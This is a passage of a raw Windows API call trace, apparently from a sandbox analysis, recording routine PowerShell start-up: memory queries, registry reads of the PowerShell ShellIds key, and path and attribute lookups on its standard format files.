RegCloseKey (hKey=0x360) returned 0x0 [0140.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.359] GetLastError () returned 0x0 [0140.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.359] GetLastError () returned 0x0 [0140.547] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.561] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.562] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.563] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.563] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.563] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.564] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.567] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.580] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.580] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.580] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.580] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.581] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.581] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.581] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.581] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.587] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.591] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.591] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.592] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.592] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.593] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.595] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.595] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.595] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.596] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.596] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.598] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.601] VirtualQuery (in: lpAddress=0x25d328, lpBuffer=0x25e328, dwLength=0x1c | out: lpBuffer=0x25e328*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.601] VirtualQuery (in: lpAddress=0x25d328, lpBuffer=0x25e328, dwLength=0x1c | out: lpBuffer=0x25e328*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.601] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.602] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.648] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.648] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.648] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.654] GetLastError () returned 0xcb [0140.658] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.666] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.666] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.667] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.667] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.668] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.668] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.671] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.673] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e4ac | out: phkResult=0x25e4ac*=0x35c) returned 0x0 [0140.680] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e514, lpData=0x0, lpcbData=0x25e510*=0x0 | out: lpType=0x25e514*=0x1, lpData=0x0, lpcbData=0x25e510*=0x74) returned 0x0 [0140.680] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e4f4, lpData=0x0, lpcbData=0x25e4f0*=0x0 | out: lpType=0x25e4f4*=0x1, lpData=0x0, lpcbData=0x25e4f0*=0x74) returned 0x0 [0140.680] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e4f4, lpData=0x2e48d0, lpcbData=0x25e4f0*=0x74 | out: lpType=0x25e4f4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e4f0*=0x74) returned 0x0 [0140.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0140.680] GetLastError () returned 0xcb [0140.680] SetErrorMode (uMode=0x1) returned 0x1 [0140.680] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e4f4 | out: lpFileInformation=0x25e4f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.680] GetLastError () returned 0xcb [0140.680] SetErrorMode (uMode=0x1) returned 0x1 [0140.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.681] GetLastError () returned 0xcb [0140.681] SetErrorMode (uMode=0x1) returned 0x1 [0140.681] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0140.682] GetLastError () returned 0xcb [0140.682] SetErrorMode (uMode=0x1) returned 0x1 [0140.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.682] GetLastError () returned 0xcb [0140.682] SetErrorMode (uMode=0x1) returned 0x1 [0140.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0140.683] GetLastError () returned 0xcb [0140.683] SetErrorMode (uMode=0x1) returned 0x1 [0140.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.683] GetLastError () returned 0xcb [0140.683] SetErrorMode (uMode=0x1) returned 0x1 [0140.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0140.684] GetLastError () returned 0xcb [0140.684] SetErrorMode (uMode=0x1) returned 0x1 [0140.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.684] GetLastError () returned 0xcb [0140.684] SetErrorMode (uMode=0x1) returned 0x1 [0140.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0140.684] GetLastError () returned 0xcb [0140.684] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0140.685] GetLastError () returned 0xcb [0140.685] SetErrorMode (uMode=0x1) returned 0x1 [0140.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0140.686] GetLastError () returned 0xcb [0140.686] SetErrorMode (uMode=0x1) returned 0x1 [0140.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0140.687] GetLastError () returned 0xcb [0140.687] SetErrorMode (uMode=0x1) returned 0x1 [0140.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0140.687] GetLastError () returned 0xcb [0140.687] SetErrorMode (uMode=0x1) returned 0x1 [0140.687] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4e8 | out: lpFileInformation=0x25e4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0140.687] GetLastError () returned 0xcb [0140.687] SetErrorMode (uMode=0x1) returned 0x1 [0140.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.688] GetLastError () returned 0xcb [0140.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.699] GetLastError () returned 0xcb [0140.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.700] GetLastError () returned 0xcb [0140.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.701] GetLastError () returned 0xcb [0140.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: 